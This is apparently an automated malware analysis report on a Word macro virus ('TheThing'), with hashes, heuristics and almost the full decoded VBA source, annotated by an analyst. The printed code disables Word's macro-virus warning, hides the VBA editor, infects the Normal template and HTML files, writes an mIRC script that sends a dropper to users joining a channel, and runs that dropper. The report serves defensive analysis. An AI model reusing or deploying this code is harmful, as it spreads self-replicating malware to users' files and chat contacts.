Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c8dc061c74337c77…

MALICIOUS

Office (OLE)

39.5 KB Created: 2003-12-26 10:38:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: ecba0b8220f9f9f27bd766af60ed4119 SHA-1: 9646cbf43770c4950a2e600c050fb95fe6e14079 SHA-256: c8dc061c74337c77fb200a25df85591d8fc16e1767829d78679e9bb4c711696e
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 (Command and Scripting Interpreter: Visual Basic); T1105 (Ingress Tool Transfer)

The sample is a Microsoft Word document containing VBA macros. The macros are designed to execute a file named 'thething.com' from the 'c:\' directory and then delete it. The script also attempts to infect HTML files by embedding its own code within them. The presence of Shell() calls and the explicit execution of a file strongly suggest downloader or dropper functionality.

Heuristics 4

  • ClamAV: Doc.Trojan.TheThing-9 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.TheThing-9
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17233 bytes
SHA-256: 7290cbee47fdaada10510207b779c62bdcaf88f1e64e13f97f622c4972d670cc
Preview script
First 1,000 lines of the extracted script
' Module header as exported by olevba. VB_Name = "ThisDocument" places this code in the
' document's own ThisDocument module, which is why the Document_Close event handler below
' runs automatically when the document is closed — no user-invoked macro name is needed.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
 ' Entry point: Word raises Document_Close when the document is closed. Every stage runs
 ' with errors suppressed, so a failure in one stage does not stop the others.
 On Error Resume Next
'TheThing
' by CyberShadow//SMF
 Call DisableAll                 ' switch off the macro-virus prompt and UI feedback
 Call infectDoc                  ' copy this module between Normal template and document
 Call infectMIRC                 ' drop an mIRC script.ini on drives C: to H:
 ' WriteDump (its body is truncated in this extraction) appears to materialise the payload
 ' in the given folder; Shell(..., 6) then launches c:\thething.com minimised without focus.
 ' The task id returned in rv is never used.
 Call WriteDump("c:\"): rv = Shell("c:\thething.com", 6)
 Kill "c:\thething.com"          ' the launched file is deleted right after Shell returns
 Call infectHTMS                 ' prepend the macro source to *.htm* files in known folders
 Application.ScreenUpdating = True
End Sub
Private Sub infectHTMS()
 ' Collects folders likely to hold HTML files and hands each one to SearchForHTM.
 On Error Resume Next
 ' Reads the "Personal" value of the Shell Folders registry key (PrivateProfileString with
 ' an empty filename is Word's registry-access form), i.e. the user's My Documents path.
 a = System.PrivateProfileString("", "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders", "Personal")
 Call SearchForHTM(a)
 ' Then every directory on PATH. The string is split on ";" by hand, presumably because
 ' Split() is not available in the VBA version Word 8.0 ships with.
 a = Environ("PATH")
 i = 1
 Do While i <= Len(a)
  c = ""
  Do While i <= Len(a) And Mid$(a, i, 1) <> ";"
   c = c + Mid$(a, i, 1)
   i = i + 1
  Loop
  Call SearchForHTM(c)
  i = i + 1                      ' step over the separator
 Loop
End Sub
' A macro named after a built-in Word command runs in place of that command. ViewVBCode
' is the command that opens the VBA editor, so a user trying to inspect the code gets
' Stealth instead. The next two one-liners intercept Tools > Macro and File > Templates
' the same way.
Private Sub ViewVBCode(): Stealth: End Sub
' Intercepts Word's built-in Tools > Macro command; runs Stealth instead of the dialog.
Private Sub ToolsMacro(): Stealth: End Sub
' Intercepts Word's built-in File > Templates command (where attached templates and their
' macros could be reviewed); runs Stealth instead.
Private Sub FileTemplates(): Stealth: End Sub
' Hides the code from the user: ShowVisualBasicEditor = 0 closes/hides the VBA editor
' (unqualified, so it presumably resolves to Application.ShowVisualBasicEditor), and
' EnableCancelKey = 0 disables Ctrl+Break so the running macro cannot be interrupted.
Private Sub Stealth(): On Error Resume Next
    ShowVisualBasicEditor = 0: Application.EnableCancelKey = 0
End Sub
' For every *.htm* file directly inside PathForHTM, rewrites the file so that this
' module's source is placed in front of the original HTML. A file whose first line is the
' sentinel "<html> <CyberShadow>" is treated as already infected and left unchanged; that
' sentinel is therefore a usable detection string for infected HTML files.
Private Sub SearchForHTM(PathForHTM)
 On Error Resume Next
 Target = Dir$(PathForHTM + "\*.htm*")
 If Target = "" Then GoTo NoHTMs
 Do
  Open PathForHTM + "\" + Target For Input As #1
  Line Input #1, a                       ' first line only: sentinel check
  If a <> "<html> <CyberShadow>" Then
   c = a
   ' The remainder is read with Input # rather than Line Input #; Input # splits on
   ' commas and quotes, so the re-emitted HTML is not guaranteed to be byte-identical.
   Do While Not EOF(1)
    Input #1, a
    c = c + Chr$(13) + Chr$(10) + a
   Loop
  Close #1
  Open PathForHTM + "\" + Target For Output As #1
   ' Copies its own source from the first VBComponent of the active document. Lines 1-29
   ' lose their first character and lines 30 .. countoflines-3 gain a leading apostrophe;
   ' that only makes sense if the module's first 29 lines are a commented-out HTML
   ' prologue, which is not present in this extraction — presumably the layout of an
   ' already-infected module. The last three lines are copied unchanged.
   Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
   For i = 1 To AD.countoflines
    ca = AD.lines(i, 1)
    If i < 30 Then ca = Mid$(ca, 2, Len(ca) - 1)
    If i >= 30 And i < AD.countoflines - 2 Then ca = "'" + ca
    If ca <> "" Then Print #1, ca        ' empty lines are dropped
   Next
  Print #1, c                            ' original HTML follows the macro text
  End If
  Close #1
  Target = Dir$                          ' next match for the same pattern
 Loop While Target <> ""
NoHTMs:
End Sub
' Tries drives C: through H: (Asc("C") + 0..5) for an mIRC installation.
Private Sub infectMIRC()
 For i = 0 To 5
  a = Chr$(Asc("C") + i)
  Call infect(a)
 Next
End Sub
' Writes <drive>:\mirc\script.ini containing an "on JOIN" handler (mIRC syntax: any user
' level, any channel) that DCC-sends <drive>:\mirc\thething.com to each joining user, then
' calls WriteDump to place that file alongside it. If the mirc folder does not exist the
' Open fails and the error handler jumps to outta, skipping the drive. The script.ini
' content is a distinctive indicator of this sample on a host.
Private Sub infect(a)
 On Error GoTo outta
 a1 = a + ":\mirc\"
 Open a1 + "script.ini" For Output As #1
  Print #1, "[script]"
  Print #1, "n0=on 1:JOIN:#:/dcc send $nick " + a1 + "thething.com"
 Close #1
 dropperPath = a1
 Call WriteDump(dropperPath)
outta:
End Sub
' Lowers Word's defences before anything else runs. Of note for defenders:
' Options.VirusProtection = False switches off Word's macro-virus warning prompt, and
' SaveNormalPrompt = False lets changes to the Normal template be saved silently.
Private Sub DisableAll()
 On Error Resume Next
 ' Clears the file attributes (0 = normal) of the Normal template so it can be overwritten;
 ' relies on NormalTemplate's default property yielding the file name.
 SetAttr NormalTemplate.Path + "\" + NormalTemplate, 0
 With Application
  .EnableCancelKey = True         ' Stealth() later sets this to 0 (disabled)
  .ScreenUpdating = False         ' no visible redraw while documents are being modified
  .ShowVisualBasicEditor = False
 End With
 With Options
  .ConfirmConversions = False
  .SaveNormalPrompt = False
  .VirusProtection = False
 End With
End Sub
' Synchronises this module between the Normal template (NT) and the active document (AD):
' whichever side does not carry the sentinel "<html> <CyberShadow>" on line 1 receives a
' full copy of the other module's source. The "</HTML" + ">" concatenation presumably
' keeps the closing-tag literal from matching its own source line once the code has been
' prepended to an HTML file by SearchForHTM.
Private Sub infectDoc()
 On Error Resume Next
 Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
 Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
 If NT.lines(1, 1) <> "<html> <CyberShadow>" Then
   NT.DeleteLines 1, NT.countoflines           ' template not marked: replace with the document's code
   NT.Insertlines 1, AD.lines(1, AD.countoflines)
 End If
 If AD.lines(1, 1) <> "<html> <CyberShadow>" Then
   AD.DeleteLines 1, AD.countoflines           ' document not marked: replace with the template's code
   AD.Insertlines 1, NT.lines(1, NT.countoflines)
 End If
 ' Trims each module after its "</HTML>" line: everything from the line after it up to,
 ' but not including, the module's final line is deleted. "countofline" (sic) on the next
 ' line is a typo; under On Error Resume Next the failed property read leaves c at its
 ' initial Empty value, so this first loop most likely never iterates — worth confirming
 ' in a sandbox rather than assuming the document module is trimmed.
 i = 1: c = AD.countofline
 Do While i <= c
  If AD.lines(i, 1) = "</HTML" + ">" Then
   AD.DeleteLines i + 1, AD.countoflines - i - 1
   i = c                                        ' forces loop exit after the first match
  End If
  i = i + 1
 Loop
 i = 1: c = NT.countoflines
 Do While i <= c
  If NT.lines(i, 1) = "</HTML" + ">" Then
   NT.DeleteLines i + 1, NT.countoflines - i - 1
   i = c
  End If
  i = i + 1
 Loop
End Sub
Private Sub WriteDump(dropperPath)
 On Error Resume Next
 Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
 checkit = "Dumpin"
 i = 1: GetDump = 0
 Do While i < AD.countoflines
  a = AD.lines(i, 1)
  If Len(a) > Len(checkit) Then
   For j = 1 To Len(a) - Len(checkit)
    If Mid$(a, j, Len(checkit) + 1) = checkit + "g" Then GetDump = i + 1: i = AD.countoflines
   Next
  End If
  i = i + 1
 Loop
 dropperBody = ""
 Do While Mid$(AD.lines(GetDump, 1), 1, 1) = "'"
  If Len(AD.lines(GetDump, 1)) > 2 Then
  
... (truncated)